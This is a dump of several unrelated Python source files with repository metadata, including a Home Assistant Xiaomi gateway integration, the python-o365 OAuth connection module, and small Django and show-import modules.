await hass.config_entries.async_reload(entry.entry_id)
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):
# check unload cloud integration
if entry.entry_id not in hass.data[DOMAIN]:
return
# remove all stats entities if disable stats
if not entry.options.get('stats'):
suffix = ('_gateway', '_zigbee', '_ble')
registry: EntityRegistry = hass.data['entity_registry']
remove = [
entity.entity_id
for entity in list(registry.entities.values())
if (entity.config_entry_id == entry.entry_id and
entity.unique_id.endswith(suffix))
]
for entity_id in remove:
registry.async_remove(entity_id)
gw: Gateway3 = hass.data[DOMAIN][entry.entry_id]
await gw.stop()
await asyncio.gather(*[
hass.config_entries.async_forward_entry_unload(entry, domain)
for domain in DOMAINS
])
return True
async def _setup_domains(hass: HomeAssistant, entry: ConfigEntry):
# init setup for each supported domains
await asyncio.gather(*[
hass.config_entries.async_forward_entry_setup(entry, domain)
for domain in DOMAINS
])
gw: Gateway3 = hass.data[DOMAIN][entry.entry_id]
gw.start()
entry.async_on_unload(
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, gw.stop)
)
async def _setup_micloud_entry(hass: HomeAssistant, config_entry):
data: dict = config_entry.data.copy()
session = async_create_clientsession(hass)
hass.data[DOMAIN]['cloud'] = cloud = MiCloud(session, data['servers'])
if 'service_token' in data:
# load devices with saved MiCloud auth
cloud.auth = data
devices = await cloud.get_devices()
else:
devices = None
if devices is None:
_LOGGER.debug(f"Login to MiCloud for {config_entry.title}")
if await cloud.login(data['username'], data['password']):
# update MiCloud auth in .storage
data.update(cloud.auth)
hass.config_entries.async_update_entry(config_entry, data=data)
devices = await cloud.get_devices()
if devices is None:
_LOGGER.error("Can't load devices from MiCloud")
else:
_LOGGER.error("Can't login to MiCloud")
# load devices from or save to .storage
store = Store(hass, 1, f"{DOMAIN}/{data['username']}.json")
if devices is None:
_LOGGER.debug("Loading a list of devices from the .storage")
devices = await store.async_load()
else:
_LOGGER.debug(f"Loaded from MiCloud {len(devices)} devices")
await store.async_save(devices)
if devices is None:
_LOGGER.debug("No devices in .storage")
return False
# TODO: Think about a bunch of devices
if 'devices' not in hass.data[DOMAIN]:
hass.data[DOMAIN]['devices'] = devices
else:
hass.data[DOMAIN]['devices'] += devices
for device in devices:
# key - mac for BLE, and did for others
did = device['did'] if device['pid'] not in '6' else \
device['mac'].replace(':', '').lower()
DevicesRegistry.defaults.setdefault(did, {})
# don't override name if exists
DevicesRegistry.defaults[did].setdefault('device_name', device['name'])
return True
async def _handle_device_remove(hass: HomeAssistant):
"""Remove device from Hass and Mi Home if the device is renamed to
`delete`.
"""
async def device_registry_updated(event: Event):
if event.data['action'] != 'update':
return
registry = hass.data['device_registry']
hass_device = registry.async_get(event.data['device_id'])
# check empty identifiers
if not hass_device or not hass_device.identifiers:
return
# handle only our devices
for hass_did in hass_device.identifiers:
if hass_did[0] == DOMAIN and hass_device.name_by_user == 'delete':
break
else:
return
# remove from Mi Home
for gw in hass.data[DOMAIN].values():
if not isinstance(gw, Gateway3):
continue
gw_device = gw.get_device(hass_did[1])
if not gw_device:
continue
if gw_device['type'] == 'zigbee':
gw.debug(f"Remove device: {gw_device['did']}")
await gw.miio.send('remove_device', [gw_device['did']])
break
# remove from Hass
registry.async_remove_device(hass_device.id)
hass.bus.async_listen('device_registry_updated', device_registry_updated)
async def _setup_logger(hass: HomeAssistant):
if not hasattr(_LOGGER, 'defaul_level'):
# default level from Hass config
_LOGGER.defaul_level = _LOGGER.level
entries = hass.config_entries.async_entries(DOMAIN)
web_logs = any(e.options.get('debug') for e in entries)
# only if global logging don't set
if _LOGGER.defaul_level == logging.NOTSET:
# disable log to console
_LOGGER.propagate = web_logs is False
# set debug if any of integrations has debug
_LOGGER.setLevel(logging.DEBUG if web_logs else logging.NOTSET)
# if don't set handler yet
if web_logs:
# skip if already added
if any(isinstance(h, XiaomiGateway3Debug) for h in _LOGGER.handlers):
return
handler = XiaomiGateway3Debug(hass)
_LOGGER.addHandler(handler)
if _LOGGER.defaul_level == logging.NOTSET:
info = await hass.helpers.system_info.async_get_system_info()
_LOGGER.debug(f"SysInfo: {info}")
| 32.758364 | 79 | 0.661825 |
c10d8f08218b22f201026b2ee8b086a98377fec6 | 95 | py | Python | src/vmc/webhook/thehive/apps.py | mSALDANHAf/vmc | 2475395a41284356a93ba7d523f4bcf2e5ef1ef7 | [
"Apache-2.0"
] | 37 | 2020-05-30T14:51:23.000Z | 2022-03-30T00:56:48.000Z | src/vmc/webhook/thehive/apps.py | mSALDANHAf/vmc | 2475395a41284356a93ba7d523f4bcf2e5ef1ef7 | [
"Apache-2.0"
] | 20 | 2019-12-05T01:06:43.000Z | 2022-02-16T17:37:52.000Z | src/vmc/webhook/thehive/apps.py | mSALDANHAf/vmc | 2475395a41284356a93ba7d523f4bcf2e5ef1ef7 | [
"Apache-2.0"
] | 10 | 2019-12-11T08:03:03.000Z | 2022-03-24T08:31:56.000Z | from django.apps import AppConfig
class TheHive(AppConfig):
name = 'vmc.webhook.thehive'
| 15.833333 | 33 | 0.747368 |
78cc7c137897ea590468a36d429848ccb172ce78 | 33,554 | py | Python | O365/connection.py | jtweeder/python-o365 | b2863d95e13066cb544ff6c620f451e8eee11d8b | [
"Apache-2.0"
] | null | null | null | O365/connection.py | jtweeder/python-o365 | b2863d95e13066cb544ff6c620f451e8eee11d8b | [
"Apache-2.0"
] | null | null | null | O365/connection.py | jtweeder/python-o365 | b2863d95e13066cb544ff6c620f451e8eee11d8b | [
"Apache-2.0"
] | null | null | null | import json
import logging
import os
import time
import warnings
from pathlib import Path
from oauthlib.oauth2 import TokenExpiredError
from requests import Session
from requests.adapters import HTTPAdapter
from requests.exceptions import HTTPError, RequestException, ProxyError
from requests.exceptions import SSLError, Timeout, ConnectionError
# Dynamic loading of module Retry by requests.packages
# noinspection PyUnresolvedReferences
from requests.packages.urllib3.util.retry import Retry
from requests_oauthlib import OAuth2Session
from stringcase import pascalcase, camelcase, snakecase
from tzlocal import get_localzone
from .utils import ME_RESOURCE, BaseTokenBackend, FileSystemTokenBackend, Token
log = logging.getLogger(__name__)
O365_API_VERSION = 'v2.0'
GRAPH_API_VERSION = 'v1.0'
OAUTH_REDIRECT_URL = 'https://login.microsoftonline.com/common/oauth2/nativeclient' # version <= 1.1.3. : 'https://outlook.office365.com/owa/'
RETRIES_STATUS_LIST = (
429, # Status code for TooManyRequests
500, 502, 503, 504 # Server errors
)
RETRIES_BACKOFF_FACTOR = 0.5
DEFAULT_SCOPES = {
# wrap any scope in a 1 element tuple to avoid prefixing
'basic': [('offline_access',), 'User.Read'],
'mailbox': ['Mail.Read'],
'mailbox_shared': ['Mail.Read.Shared'],
'message_send': ['Mail.Send'],
'message_send_shared': ['Mail.Send.Shared'],
'message_all': ['Mail.ReadWrite', 'Mail.Send'],
'message_all_shared': ['Mail.ReadWrite.Shared', 'Mail.Send.Shared'],
'address_book': ['Contacts.Read'],
'address_book_shared': ['Contacts.Read.Shared'],
'address_book_all': ['Contacts.ReadWrite'],
'address_book_all_shared': ['Contacts.ReadWrite.Shared'],
'calendar': ['Calendars.ReadWrite'],
'users': ['User.ReadBasic.All'],
'onedrive': ['Files.ReadWrite.All'],
'sharepoint_dl': ['Sites.ReadWrite.All'],
}
class Protocol:
""" Base class for all protocols """
# Override these in subclass
_protocol_url = 'not_defined' # Main url to request.
_oauth_scope_prefix = '' # Prefix for scopes
_oauth_scopes = {} # Dictionary of {scopes_name: [scope1, scope2]}
def __init__(self, *, protocol_url=None, api_version=None,
default_resource=ME_RESOURCE,
casing_function=None, protocol_scope_prefix=None,
timezone=None, **kwargs):
""" Create a new protocol object
:param str protocol_url: the base url used to communicate with the
server
:param str api_version: the api version
:param str default_resource: the default resource to use when there is
nothing explicitly specified during the requests
:param function casing_function: the casing transform function to be
used on api keywords (camelcase / pascalcase)
:param str protocol_scope_prefix: prefix url for scopes
:param pytz.UTC timezone: preferred timezone, defaults to the
system timezone
:raises ValueError: if protocol_url or api_version are not supplied
"""
if protocol_url is None or api_version is None:
raise ValueError(
'Must provide valid protocol_url and api_version values')
self.protocol_url = protocol_url or self._protocol_url
self.protocol_scope_prefix = protocol_scope_prefix or ''
self.api_version = api_version
self.service_url = '{}{}/'.format(protocol_url, api_version)
self.default_resource = default_resource
self.use_default_casing = True if casing_function is None else False
self.casing_function = casing_function or camelcase
self.timezone = timezone or get_localzone() # pytz timezone
self.max_top_value = 500 # Max $top parameter value
# define any keyword that can be different in this protocol
# for example, attachments Odata type differs between Outlook
# rest api and graph: (graph = #microsoft.graph.fileAttachment and
# outlook = #Microsoft.OutlookServices.FileAttachment')
self.keyword_data_store = {}
def get_service_keyword(self, keyword):
""" Returns the data set to the key in the internal data-key dict
:param str keyword: key to get value for
:return: value of the keyword
"""
return self.keyword_data_store.get(keyword, None)
def convert_case(self, key):
""" Returns a key converted with this protocol casing method
Converts case to send/read from the cloud
When using Microsoft Graph API, the keywords of the API use
lowerCamelCase Casing
When using Office 365 API, the keywords of the API use PascalCase Casing
Default case in this API is lowerCamelCase
:param str key: a dictionary key to convert
:return: key after case conversion
:rtype: str
"""
return key if self.use_default_casing else self.casing_function(key)
@staticmethod
def to_api_case(key):
""" Converts key to snake_case
:param str key: key to convert into snake_case
:return: key after case conversion
:rtype: str
"""
return snakecase(key)
def get_scopes_for(self, user_provided_scopes):
""" Returns a list of scopes needed for each of the
scope_helpers provided, by adding the prefix to them if required
:param user_provided_scopes: a list of scopes or scope helpers
:type user_provided_scopes: list or tuple or str
:return: scopes with url prefix added
:rtype: list
:raises ValueError: if unexpected datatype of scopes are passed
"""
if user_provided_scopes is None:
# return all available scopes
user_provided_scopes = [app_part for app_part in self._oauth_scopes]
elif isinstance(user_provided_scopes, str):
user_provided_scopes = [user_provided_scopes]
if not isinstance(user_provided_scopes, (list, tuple)):
raise ValueError(
"'user_provided_scopes' must be a list or a tuple of strings")
scopes = set()
for app_part in user_provided_scopes:
for scope in self._oauth_scopes.get(app_part, [(app_part,)]):
scopes.add(self._prefix_scope(scope))
return list(scopes)
def _prefix_scope(self, scope):
""" Inserts the protocol scope prefix if required"""
if self.protocol_scope_prefix:
if isinstance(scope, tuple):
return scope[0]
elif scope.startswith(self.protocol_scope_prefix):
return scope
else:
return '{}{}'.format(self.protocol_scope_prefix, scope)
else:
if isinstance(scope, tuple):
return scope[0]
else:
return scope
class MSGraphProtocol(Protocol):
""" A Microsoft Graph Protocol Implementation
https://docs.microsoft.com/en-us/outlook/rest/compare-graph-outlook
"""
_protocol_url = 'https://graph.microsoft.com/'
_oauth_scope_prefix = 'https://graph.microsoft.com/'
_oauth_scopes = DEFAULT_SCOPES
def __init__(self, api_version='v1.0', default_resource=ME_RESOURCE,
**kwargs):
""" Create a new Microsoft Graph protocol object
_protocol_url = 'https://graph.microsoft.com/'
_oauth_scope_prefix = 'https://graph.microsoft.com/'
:param str api_version: api version to use
:param str default_resource: the default resource to use when there is
nothing explicitly specified during the requests
"""
super().__init__(protocol_url=self._protocol_url,
api_version=api_version,
default_resource=default_resource,
casing_function=camelcase,
protocol_scope_prefix=self._oauth_scope_prefix,
**kwargs)
self.keyword_data_store['message_type'] = 'microsoft.graph.message'
self.keyword_data_store['event_message_type'] = 'microsoft.graph.eventMessage'
self.keyword_data_store[
'file_attachment_type'] = '#microsoft.graph.fileAttachment'
self.keyword_data_store[
'item_attachment_type'] = '#microsoft.graph.itemAttachment'
self.max_top_value = 999 # Max $top parameter value
class MSOffice365Protocol(Protocol):
""" A Microsoft Office 365 Protocol Implementation
https://docs.microsoft.com/en-us/outlook/rest/compare-graph-outlook
"""
_protocol_url = 'https://outlook.office.com/api/'
_oauth_scope_prefix = 'https://outlook.office.com/'
_oauth_scopes = DEFAULT_SCOPES
def __init__(self, api_version='v2.0', default_resource=ME_RESOURCE,
**kwargs):
""" Create a new Office 365 protocol object
_protocol_url = 'https://outlook.office.com/api/'
_oauth_scope_prefix = 'https://outlook.office.com/'
:param str api_version: api version to use
:param str default_resource: the default resource to use when there is
nothing explicitly specified during the requests
"""
super().__init__(protocol_url=self._protocol_url,
api_version=api_version,
default_resource=default_resource,
casing_function=pascalcase,
protocol_scope_prefix=self._oauth_scope_prefix,
**kwargs)
self.keyword_data_store[
'message_type'] = 'Microsoft.OutlookServices.Message'
self.keyword_data_store[
'event_message_type'] = 'Microsoft.OutlookServices.EventMessage'
self.keyword_data_store[
'file_attachment_type'] = '#Microsoft.OutlookServices.' \
'FileAttachment'
self.keyword_data_store[
'item_attachment_type'] = '#Microsoft.OutlookServices.' \
'ItemAttachment'
self.max_top_value = 999 # Max $top parameter value
class Connection:
""" Handles all communication (requests) between the app and the server """
_allowed_methods = ['get', 'post', 'put', 'patch', 'delete']
def __init__(self, credentials, *, scopes=None,
proxy_server=None, proxy_port=8080, proxy_username=None,
proxy_password=None, requests_delay=200, raise_http_errors=True,
request_retries=3, token_file_name=None, token_backend=None,
tenant_id='common', **kwargs):
""" Creates an API connection object
:param tuple credentials: a tuple of (client_id, client_secret)
Generate client_id and client_secret in https://apps.dev.microsoft.com
:param list[str] scopes: list of scopes to request access to
:param str proxy_server: the proxy server
:param int proxy_port: the proxy port, defaults to 8080
:param str proxy_username: the proxy username
:param str proxy_password: the proxy password
:param int requests_delay: number of milliseconds to wait between api
calls.
The Api will respond with 429 Too many requests if more than
17 requests are made per second. Defaults to 200 milliseconds
just in case more than 1 connection is making requests
across multiple processes.
:param bool raise_http_errors: If True Http 4xx and 5xx status codes
will raise as exceptions
:param int request_retries: number of retries done when the server
responds with 5xx error codes.
:param str token_file_name: custom token file name to be used when
storing the OAuth token credentials.
:param BaseTokenBackend token_backend: the token backend used to get
and store tokens
:param str tenant_id: use this specific tenant id, defaults to common
:param dict kwargs: any extra params passed to Connection
:raises ValueError: if credentials is not tuple of
(client_id, client_secret)
"""
if not isinstance(credentials, tuple) or len(credentials) != 2 or (
not credentials[0] and not credentials[1]):
raise ValueError('Provide valid auth credentials')
self.auth = credentials
self.scopes = scopes
self.store_token = True
# TODO: remove "token_file_name" in a future release
if token_file_name is not None:
warnings.warn('"token_file_name" will be removed in future versions.'
' Please use "token_backend" instead', DeprecationWarning)
token_backend = token_backend or FileSystemTokenBackend(token_filename=token_file_name)
if not isinstance(token_backend, BaseTokenBackend):
raise ValueError('"token_backend" must be an instance of a subclass of BaseTokenBackend')
self.token_backend = token_backend
self.session = None # requests Oauth2Session object
self.proxy = {}
self.set_proxy(proxy_server, proxy_port, proxy_username, proxy_password)
self.requests_delay = requests_delay or 0
self._previous_request_at = None # store previous request time
self.raise_http_errors = raise_http_errors
self.request_retries = request_retries
self.naive_session = Session() # requests Session object
self.naive_session.proxies = self.proxy
if self.request_retries:
retry = Retry(total=self.request_retries, read=self.request_retries,
connect=self.request_retries,
backoff_factor=RETRIES_BACKOFF_FACTOR,
status_forcelist=RETRIES_STATUS_LIST)
adapter = HTTPAdapter(max_retries=retry)
self.naive_session.mount('http://', adapter)
self.naive_session.mount('https://', adapter)
self._oauth2_authorize_url = 'https://login.microsoftonline.com/' \
'{}/oauth2/v2.0/authorize'.format(tenant_id)
self._oauth2_token_url = 'https://login.microsoftonline.com/' \
'{}/oauth2/v2.0/token'.format(tenant_id)
def set_proxy(self, proxy_server, proxy_port, proxy_username,
proxy_password):
""" Sets a proxy on the Session
:param str proxy_server: the proxy server
:param int proxy_port: the proxy port, defaults to 8080
:param str proxy_username: the proxy username
:param str proxy_password: the proxy password
"""
if proxy_server and proxy_port:
if proxy_username and proxy_password:
self.proxy = {
"http": "http://{}:{}@{}:{}".format(proxy_username,
proxy_password,
proxy_server,
proxy_port),
"https": "https://{}:{}@{}:{}".format(proxy_username,
proxy_password,
proxy_server,
proxy_port),
}
else:
self.proxy = {
"http": "http://{}:{}".format(proxy_server, proxy_port),
"https": "https://{}:{}".format(proxy_server, proxy_port),
}
def check_token_file(self):
""" Checks if the token file exists at the given position
:return: if file exists or not
:rtype: bool
"""
# TODO: remove this method in a future release
warnings.warn('This method will be removed in future versions',
DeprecationWarning)
return self.token_backend.check_token() if hasattr(self.token_backend, 'check_token') else None
def get_authorization_url(self, requested_scopes=None,
redirect_uri=OAUTH_REDIRECT_URL, **kwargs):
""" Initializes the oauth authorization flow, getting the
authorization url that the user must approve.
:param list[str] requested_scopes: list of scopes to request access for
:param str redirect_uri: redirect url configured in registered app
:param kwargs: allow to pass unused params in conjunction with Connection
:return: authorization url
:rtype: str
"""
client_id, client_secret = self.auth
if requested_scopes:
scopes = requested_scopes
elif self.scopes is not None:
scopes = self.scopes
else:
raise ValueError('Must provide at least one scope')
self.session = oauth = OAuth2Session(client_id=client_id,
redirect_uri=redirect_uri,
scope=scopes)
self.session.proxies = self.proxy
if self.request_retries:
retry = Retry(total=self.request_retries, read=self.request_retries,
connect=self.request_retries,
backoff_factor=RETRIES_BACKOFF_FACTOR,
status_forcelist=RETRIES_STATUS_LIST)
adapter = HTTPAdapter(max_retries=retry)
self.session.mount('http://', adapter)
self.session.mount('https://', adapter)
# TODO: access_type='offline' has no effect according to documentation
# This is done through scope 'offline_access'.
auth_url, state = oauth.authorization_url(
url=self._oauth2_authorize_url, access_type='offline')
return auth_url
def request_token(self, authorization_url, store_token=True,
token_path=None, **kwargs):
""" Authenticates for the specified url and gets the token, save the
token for future based if requested
:param str authorization_url: url given by the authorization flow
:param bool store_token: whether or not to store the token,
so u don't have to keep opening the auth link and
authenticating every time
:param Path token_path: full path to where the token should be saved to
:param kwargs: allow to pass unused params in conjunction with Connection
:return: Success/Failure
:rtype: bool
"""
if self.session is None:
raise RuntimeError("Fist call 'get_authorization_url' to "
"generate a valid oauth object")
# TODO: remove token_path in future versions
if token_path is not None:
warnings.warn('"token_path" param will be removed in future versions.'
' Use a TokenBackend instead', DeprecationWarning)
_, client_secret = self.auth
# Allow token scope to not match requested scope.
# (Other auth libraries allow this, but Requests-OAuthlib
# raises exception on scope mismatch by default.)
os.environ['OAUTHLIB_RELAX_TOKEN_SCOPE'] = '1'
os.environ['OAUTHLIB_IGNORE_SCOPE_CHANGE'] = '1'
try:
self.token_backend.token = Token(self.session.fetch_token(
token_url=self._oauth2_token_url,
authorization_response=authorization_url,
include_client_id=True,
client_secret=client_secret))
except Exception as e:
log.error('Unable to fetch auth token. Error: {}'.format(str(e)))
return False
if store_token:
self.token_backend.save_token()
return True
def get_session(self, token_path=None):
""" Create a requests Session object
:param Path token_path: (Only oauth) full path to where the token
should be load from
:return: A ready to use requests session
:rtype: OAuth2Session
"""
# TODO: remove token_path in future versions
warnings.warn('"token_path" param will be removed in future versions.'
' Use a TokenBackend instead.', DeprecationWarning)
# gets a fresh token from the store
token = self.token_backend.get_token()
if token:
client_id, _ = self.auth
session = OAuth2Session(client_id=client_id, token=token)
else:
raise RuntimeError(
'No auth token found. Authentication Flow needed')
session.proxies = self.proxy
if self.request_retries:
retry = Retry(total=self.request_retries, read=self.request_retries,
connect=self.request_retries,
backoff_factor=RETRIES_BACKOFF_FACTOR,
status_forcelist=RETRIES_STATUS_LIST)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
def refresh_token(self):
"""
Refresh the OAuth authorization token.
This will be called automatically when the access token
expires, however, you can manually call this method to
request a new refresh token.
:return bool: Success / Failure
"""
if self.session is None:
self.session = self.get_session()
token = self.token_backend.token
if token and token.is_long_lived:
client_id, client_secret = self.auth
token = Token(self.session.refresh_token(
self._oauth2_token_url,
client_id=client_id,
client_secret=client_secret))
else:
log.error('You can not refresh an access token that has no "refreh_token" available.'
'Include "offline_access" scope when authentication to get a "refresh_token"')
return False
self.token_backend.token = token
if self.store_token:
self.token_backend.save_token()
return True
def _check_delay(self):
""" Checks if a delay is needed between requests and sleeps if True """
if self._previous_request_at:
dif = round(time.time() - self._previous_request_at,
2) * 1000 # difference in miliseconds
if dif < self.requests_delay:
time.sleep(
(self.requests_delay - dif) / 1000) # sleep needs seconds
self._previous_request_at = time.time()
def _internal_request(self, request_obj, url, method, **kwargs):
""" Internal handling of requests. Handles Exceptions.
:param request_obj: a requests session.
:param str url: url to send request to
:param str method: type of request (get/put/post/patch/delete)
:param kwargs: extra params to send to the request api
:return: Response of the request
:rtype: requests.Response
"""
method = method.lower()
if method not in self._allowed_methods:
raise ValueError('Method must be one of the allowed ones')
if method == 'get':
kwargs.setdefault('allow_redirects', True)
elif method in ['post', 'put', 'patch']:
if 'headers' not in kwargs:
kwargs['headers'] = {}
if kwargs.get('headers') is not None and kwargs['headers'].get(
'Content-type') is None:
kwargs['headers']['Content-type'] = 'application/json'
if 'data' in kwargs and kwargs['headers'].get(
'Content-type') == 'application/json':
kwargs['data'] = json.dumps(
kwargs['data']) # auto convert to json
request_done = False
token_refreshed = False
while not request_done:
self._check_delay() # sleeps if needed
try:
log.info('Requesting ({}) URL: {}'.format(method.upper(), url))
log.info('Request parameters: {}'.format(kwargs))
# auto_retry will occur inside this function call if enabled
response = request_obj.request(method, url,
**kwargs)
response.raise_for_status() # raise 4XX and 5XX error codes.
log.info('Received response ({}) from URL {}'.format(
response.status_code, response.url))
request_done = True
return response
except TokenExpiredError as e:
# Token has expired, try to refresh the token and try again on the next loop
if not self.token_backend.token.is_long_lived:
raise e
if token_refreshed:
# Refresh token done but still TokenExpiredError raise
raise RuntimeError('Token Refresh Operation not working')
log.info('Oauth Token is expired, fetching a new token')
self.refresh_token()
log.info('New oauth token fetched')
token_refreshed = True
except (ConnectionError, ProxyError, SSLError, Timeout) as e:
# We couldn't connect to the target url, raise error
log.debug('Connection Error calling: {}.{}'
''.format(url, ('Using proxy: {}'.format(self.proxy)
if self.proxy else '')))
raise e # re-raise exception
except HTTPError as e:
# Server response with 4XX or 5XX error status codes
# try to extract the error message:
try:
error = response.json()
error_message = error.get('error', {}).get('message', '')
except ValueError:
error_message = ''
status_code = int(e.response.status_code / 100)
if status_code == 4:
# Client Error
# Logged as error. Could be a library error or Api changes
log.error('Client Error: {} | Error Message: {}'.format(str(e), error_message))
else:
# Server Error
log.debug('Server Error: {}'.format(str(e)))
if self.raise_http_errors:
if error_message:
raise HTTPError('{} | Error Message: {}'.format(e.args[0], error_message), response=response) from None
else:
raise e
else:
return e.response
except RequestException as e:
# catch any other exception raised by requests
log.debug('Request Exception: {}'.format(str(e)))
raise e
def naive_request(self, url, method, **kwargs):
""" Makes a request to url using an without oauth authorization
session, but through a normal session
:param str url: url to send request to
:param str method: type of request (get/put/post/patch/delete)
:param kwargs: extra params to send to the request api
:return: Response of the request
:rtype: requests.Response
"""
return self._internal_request(self.naive_session, url, method, **kwargs)
def oauth_request(self, url, method, **kwargs):
""" Makes a request to url using an oauth session
:param str url: url to send request to
:param str method: type of request (get/put/post/patch/delete)
:param kwargs: extra params to send to the request api
:return: Response of the request
:rtype: requests.Response
"""
# oauth authentication
if self.session is None:
self.session = self.get_session()
return self._internal_request(self.session, url, method, **kwargs)
def get(self, url, params=None, **kwargs):
""" Shorthand for self.oauth_request(url, 'get')
:param str url: url to send get oauth request to
:param dict params: request parameter to get the service data
:param kwargs: extra params to send to request api
:return: Response of the request
:rtype: requests.Response
"""
return self.oauth_request(url, 'get', params=params, **kwargs)
def post(self, url, data=None, **kwargs):
""" Shorthand for self.oauth_request(url, 'post')
:param str url: url to send post oauth request to
:param dict data: post data to update the service
:param kwargs: extra params to send to request api
:return: Response of the request
:rtype: requests.Response
"""
return self.oauth_request(url, 'post', data=data, **kwargs)
def put(self, url, data=None, **kwargs):
""" Shorthand for self.oauth_request(url, 'put')
:param str url: url to send put oauth request to
:param dict data: put data to update the service
:param kwargs: extra params to send to request api
:return: Response of the request
:rtype: requests.Response
"""
return self.oauth_request(url, 'put', data=data, **kwargs)
def patch(self, url, data=None, **kwargs):
""" Shorthand for self.oauth_request(url, 'patch')
:param str url: url to send patch oauth request to
:param dict data: patch data to update the service
:param kwargs: extra params to send to request api
:return: Response of the request
:rtype: requests.Response
"""
return self.oauth_request(url, 'patch', data=data, **kwargs)
def delete(self, url, **kwargs):
""" Shorthand for self.request(url, 'delete')
:param str url: url to send delete oauth request to
:param kwargs: extra params to send to request api
:return: Response of the request
:rtype: requests.Response
"""
return self.oauth_request(url, 'delete', **kwargs)
def _save_token(self, token, token_path=None):
""" Save the specified token dictionary to a specified file path
:param dict token: token dictionary returned by the oauth token request,
to be saved
:param Path token_path: Path to the file with token information saved
:return: Success/Failure
:rtype: bool
"""
# TODO: remove this method in future versions
warnings.warn('This method is deprecated. Use a TokenBackend instead.', DeprecationWarning)
return False
def _load_token(self, token_path=None):
""" Load the specified token dictionary from specified file path
:param Path token_path: Path to the file with token information saved
:return: token data
:rtype: dict
"""
# TODO: remove this method in future versions
warnings.warn('This method is deprecated. Use a TokenBackend instead.', DeprecationWarning)
return False
def _delete_token(self, token_path=None):
""" Delete the specified token dictionary from specified file path
:param Path token_path: Path to the file with token information saved
:return: Success/Failure
:rtype: bool
"""
# TODO: remove this method in future versions
warnings.warn('This method is deprecated. Use a TokenBackend instead.', DeprecationWarning)
return False
def __del__(self):
"""
Clear the session by closing it
This should be called manually by the user "del account.con"
There is no guarantee that this method will be called by the garbage collection
But this is not an issue because this connections willbe automatically closed.
"""
if self.session:
self.session.close()
def oauth_authentication_flow(client_id, client_secret, scopes=None,
protocol=None, **kwargs):
""" A helper method to perform the OAuth2 authentication flow.
Authenticate and get the oauth token
:param str client_id: the client_id
:param str client_secret: the client_secret
:param list[str] scopes: a list of protocol user scopes to be converted
by the protocol or raw scopes
:param Protocol protocol: the protocol to be used.
Defaults to MSGraphProtocol
:param kwargs: other configuration to be passed to the Connection instance,
connection.get_authorization_url or connection.request_token
:return: Success or Failure
:rtype: bool
"""
credentials = (client_id, client_secret)
protocol = protocol or MSGraphProtocol()
con = Connection(credentials, scopes=protocol.get_scopes_for(scopes),
**kwargs)
consent_url = con.get_authorization_url(**kwargs)
print('Visit the following url to give consent:')
print(consent_url)
token_url = input('Paste the authenticated url here: ')
if token_url:
result = con.request_token(token_url, **kwargs)
if result:
print('Authentication Flow Completed. Oauth Access Token Stored. '
'You can now use the API.')
else:
print('Something go wrong. Please try again.')
return bool(result)
else:
print('Authentication Flow aborted.')
return False
| 42.259446 | 144 | 0.618406 |
36f8c6bf1b1f15eb867ce7f6cd5a26cec6eb5895 | 293 | py | Python | shows/Shows.py | stuporglue/hammond | dde0198afc269406e5b6e5057faa68866f765d06 | [
"MIT"
] | null | null | null | shows/Shows.py | stuporglue/hammond | dde0198afc269406e5b6e5057faa68866f765d06 | [
"MIT"
] | null | null | null | shows/Shows.py | stuporglue/hammond | dde0198afc269406e5b6e5057faa68866f765d06 | [
"MIT"
] | null | null | null | from shows.Adventure import Adventure
from shows.Clouds import Clouds
from shows.JurrasicPark import JurrasicPark
from shows.Roar import Roar
from shows.Roar2 import Roar2
from shows.Volcano import Volcano
from shows.Waves import Waves
from shows.Testing_The_Fences import Testing_The_Fences
| 32.555556 | 55 | 0.860068 |
095c2b3bd06ed4d23d6f2fa1eb6fd179771c1c10 | 761 | py | Python | interaction/views.py | hugocorra/bjorncrm | 1304b90c1f7d32942e1b4987c43a2ff9dede22dd | [
"MIT"
] | 2 | 2018-08-27T00:47:18.000Z | 2020-12-11T01:23:59.000Z | interaction/views.py | hugocorra/bjorncrm | 1304b90c1f7d32942e1b4987c43a2ff9dede22dd | [
"MIT"
] | null | null | null | interaction/views.py | hugocorra/bjorncrm | 1304b90c1f7d32942e1b4987c43a2ff9dede22dd | [
"MIT"
] | 1 | 2020-12-11T01:24:02.000Z | 2020-12-11T01:24:02.000Z | from django.shortcuts import render
from django.views.generic import ListView
from django.views.generic.edit import CreateView, DeleteView, UpdateView
from django.urls import reverse_lazy
from contacts.models import Contato
from interaction.forms import InteracaoForm
from interaction.models import Interacao, InteracaoContatos
class InteracaoList(ListView):
model = Interacao
#def get_context_data(self, **kwargs)
class InteracaoCreate(CreateView):
template_name = 'interaction/interaction_create_update.html'
form_class = InteracaoForm
success_url = reverse_lazy('interaction:interacao-list')
def get_context_data(self, **kwargs):
context = super(InteracaoCreate, self).get_context_data(**kwargs)
return context
| 30.44 | 73 | 0.78975 |
22006fcb2197796b2e95b6099fc90ed7fece7e0c | 817 | py | Python | main.py | SalSatSat/RandomHadith | 1077caa6ebb9be8a71c9c24ef9c89fe41cb4dced | [
"MIT"
] | null | null | null | main.py | SalSatSat/RandomHadith | 1077caa6ebb9be8a71c9c24ef9c89fe41cb4dced | [
"MIT"
] | null | null | null | main.py | SalSatSat/RandomHadith | 1077caa6ebb9be8a71c9c24ef9c89fe41cb4dced | [
"MIT"
] | null | null | null | import requests
import json
from Utils import printJSON
from Book import Book
def initBooks() -> []:
try:
response = requests.get("https://ahadith-api.herokuapp.com/api/books/en")
# print(response.status_code)
# printJSON(response.json())
booksText = json.dumps(response.json(), sort_keys=True, indent=4)
booksData = json.loads(booksText)
books = []
for bookData in booksData['Books']:
book = Book(bookData['Book_ID'], bookData['Book_Name'])
books.append(book)
except requests.exceptions.RequestException as e:
print(e)
raise SystemExit(e)
return books
books = initBooks()
ahadith = books[0].getChapter(1).getAhadith(1)
print(f"Hadith {ahadith.id}")
print(ahadith.sanad)
print(ahadith.text)
| 26.354839 | 81 | 0.642595 |
f23a9d64736feefd99073bc5f184386ba83b318a | 11,119 | py | Python | N420_app/growbox.py | mattmatt91/N420 | 443d5e681800cb5bff468bb574407bbbbd6e221e | [
"MIT"
] | null | null | null | N420_app/growbox.py | mattmatt91/N420 | 443d5e681800cb5bff468bb574407bbbbd6e221e | [
"MIT"
] | null | null | null | N420_app/growbox.py | mattmatt91/N420 | 443d5e681800cb5bff468bb574407bbbbd6e221e | [
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
from time import sleep, time
from log_data import Logger,Preferences
